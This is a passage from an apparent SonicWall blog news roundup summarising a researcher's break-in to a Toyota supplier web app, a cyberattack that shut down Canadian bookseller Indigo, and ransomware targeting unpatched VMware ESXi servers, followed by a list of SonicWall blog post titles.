A web app for Toyota employees and suppliers was broken into by an ethical hacker who simply knew the email address of one of its users. The security researcher revealed that he discovered the backdoor into the app in October. In a blog post about the attack he explained that he was able to log in as any corporate user or supplier, and used that entry point to log in as a system administrator and gain total control over the app. According to Dark Reading, he then had full access to internal projects, documents and user accounts. This is yet another sign that every business should take extra care with its cybersecurity; Toyota is lucky that this hacker was ethical.

Canadian Bookseller Goes Dark Following Cyberattack

The largest book retailer in Canada, Indigo Books & Music, shut down following a cyberattack. The retailer was forced to take its website offline and resort to cash only payments at its physical locations. The attack even made gift card purchases impossible. According to Bleeping Computer, it’s still unclear what type of attack the bookseller suffered. The retailer released a statement indicating they are working with a third party to determine the cause and resolve the situation.

VMware Bug Exploitation Attracts Ransomware Attacks

According to Hacker News, attacks on VMware ESXi hypervisors are deploying ransomware on vulnerable systems. The attacks target outdated software; a patch has been available since February 2021. Experts believe the campaign can be traced to a Rust-based ransomware strain called 'Nevada.' VMware recommends that users update to the latest patch to avoid any issues.

SonicWall Blog

Can You Catch All the Phish? Take Our New Phishing IQ Quiz and Find Out! – Ken Dang

Celebrating 2023 With Expanded “3 & Free” – Matt Brennan

‘3 & Free’ Promotion: How to Upgrade to a New SonicWall TZ Series NGFW for Free – Matt Brennan

The Art of Cyber War: Sun Tzu and Cybersecurity – Ray Wyman

Talking Boundless Cybersecurity at the Schoolscape IT 2022 Conference – Mohamed Abdallah

3 & Free: 1 Amazing Deal, 2 Exceptional Firewalls, 3 Years of Superior Threat Protection – Matt Brennan

SonicWall Wins CRN’s 2022 Tech Innovator Award in Enterprise Network Security – Bret Fitzgerald

SonicWall Included on the Acclaimed CRN Edge Computing 100 List for 2022 – Bret Fitzgerald

A New Era of Partnering to Win – Robert (Bob) VanKirk

Multiply Your Security with Multifactor Authentication – Amber Wolff

10 Reasons to Upgrade to the Latest SonicWall Gen 7 TZ Firewall – Sarah Choi